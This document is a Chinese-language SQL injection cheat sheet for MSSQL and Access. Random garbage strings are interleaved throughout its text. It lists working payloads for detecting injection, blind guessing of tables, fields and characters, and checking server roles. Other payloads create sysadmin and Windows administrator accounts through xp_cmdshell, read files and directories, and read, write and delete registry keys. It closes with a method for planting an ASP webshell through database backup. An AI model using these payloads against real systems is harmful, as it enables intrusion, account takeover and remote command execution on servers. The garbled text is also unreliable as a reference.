1.判断是否有注入;and 1=1 ;and 1=2 $q6'VLPo
2.初步判断是否是mssql ;and user>0 _~ipO1*
U@$=0*
3.注入参数是字符'and [查询条件] and ''=' I2wT]L UV
'Na/AcRdg
4.搜索时没过滤参数的'and [查询条件] and '%25'=' .{|AHW&0<
~?c}=XL-
5.判断数据库系统 wCb%{iowH
<C'S#5,2
;and (select count(*) from sysobjects)>0 mssql Ay Obaa5
%Jpb&CEY
;and (select count(*) from msysobjects)>0 access =!`\=!y
6/#5TdJA
mJ%r2$/*
]3E':JM@
6.猜数据库 ;and (select Count(*) from [数据库名])>0 d">Ya !W
9$xEktfV
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 DgLSDKO!
> HL8hN'q'
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 =/Dp*
U&|$B|[
9.(1)猜字段的ascii值(access) PUN.nt
o\luE{H
.?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (qP !x 2j
0P_Y6w+
(2)猜字段的ascii值(mssql) nAp7X-t
4D/mm(2d$
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 >)N}V'9
Mlpq2I_x
10.测试权限结构(mssql) _5nQe
!
Wsr #YNhx|
"Jp6EL%
pP'-}%
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- z^f-MgWG
CDcs~PR@B
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- $Q:5KNF+p
Q#bFW?>y,
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- )W@H
^saJfr x
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 5m+:GiI
/N@0qQ
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- uREc9z`Q'
t3/!esay
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- azB~>#H~
n^/,>7J
;and 1=(select IS_MEMBER('db_owner'));-- ]T+.kC
M
>NE]TZ.F
fxLhVJ"b
J<_&f_K0]
11.添加mssql和系统的帐户 l!ye\
aAko-,URC
;exec master.dbo.sp_addlogin username;-- ,gU9ywg
;exec master.dbo.sp_password null,username,password;-- ?.A6HrAPB
'ce9v@(0
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- utwh"E&W
^;YD3EZw
;exec master.dbo.xp_cmdshell 'net user username password i[ BR"(
P|.KMtG
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 8I C((
D0QXvrf
;exec master.dbo.xp_cmdshell 'net user username password /add';-- t:M({|m Y
r _r$nl
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- q9Y0Lk
^d"tymDd
(6\A"jey\x
a~ REFy
12.(1)遍历目录 [jumq1
B>47Ic
;create table dirs(paths varchar(100), id int) wH#k~`M
CSU> nIE0
;insert dirs exec master.dbo.xp_dirtree 'c:\' $zCUQthL@
{uj9fE,)
;and (select top 1 paths from dirs)>0 g{$&j*Q9
(oJ#`k:&n
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) W,agPG\+
PJAir8
raJyo>xXb5
`T9<}&=!
(2)遍历目录 Gz *U?R-T
kd\G>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- !s)2H/KM 8
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $]81 s`
Q)a*bPz
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *pasI.2s#
iCx'`^HnP
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Q}2w~Cn\S
f\(K ou$
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 TU. h
# |UrHK;
3!$rp- !<)
5WZLB =
13.mssql中的存储过程 103Ik6.o
E$G"R=
xp_regenumvalues 注册表根键, 子键 [=E<iPl
.Yu,&HR
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 d&'6l"${
50H [u|
xp_regread 根键,子键,键值名 mI`dZ3h
;5=pBP.
;exec xp_regread 98 O z
U3U eTa_
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 x@k9]6/zs
rfPJBD{Ve
xp_regwrite 根键,子键, 值名, 值类型, 值 *p WswcV/
!E7/:t4
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;%82Z4
d#z67Nl6
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 "{0kg'fU
ng 6G<hi
xp_regdeletevalue 根键,子键,值名 TOuFFR
W4YC5ZH{l
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 krl yEAK=
q{_buTARq
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /cjf 1Dc
H+0 *
A qm0|GlJ
a,tP.Xsl
14.mssql的backup创建webshell j/Kw-h ,5"
Kc{wv/6}T
use model uuC/F_='B
{jq-dL
create table cmd(str image); p' gv5\u[w
H5aUZ=
insert into cmd(str) values (''); _88~uYG
0bd.ess
backup database model to disk='c:\l.asp'; 0s4j>
?D~uR2+Z
1IsR}uLh
FQ 4rA 4
15.mssql内置函数 0+H"$2/
>%[W2L\'
;and (select @@version)>0 获得Windows的版本号 @O(\TIg
UmJg-~
;and user_name()='dbo' 判断当前系统的连接用户是不是sa HU'E}8%t6
FJ[(dGKeE
;and (select user_name())>0 爆当前系统的连接用户 a[JgR /E@x
P~*fZ)\}F@
;and (select db_name())>0 得到当前连接的数据库 qj/P4 *6E
EagI)W!s[
Fq3;7Cq=hD
lk'RWy"pw
16.简洁的webshell =Vv{ td
& 3a+6!L[
use model L@ay4,e.bz
>pYgF=J
create table cmd(str image); /za,&7sf
]Lh\[@#1f
insert into cmd(str) values (''); 4q~E\l|.5
&Y&zUfA
backup database model to disk='g:\wwwtest\l.asp';